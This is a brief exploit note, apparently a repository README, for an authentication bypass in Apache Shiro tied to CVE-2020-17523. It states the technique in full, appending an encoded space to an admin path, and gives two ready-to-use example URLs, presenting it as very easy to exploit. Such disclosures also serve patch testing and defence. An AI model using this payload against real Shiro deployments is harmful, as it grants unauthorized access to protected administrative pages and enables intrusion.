Apache Shiro very easy to exploit authentication bypass vulnerability.
Use blank characters such as spaces to bypass shiro authentication:
http://127.0.0.1/admin/%20 or http://127.0.0.1/admin/%20/
https://github.com/jweny/shiro-cve-2020-17523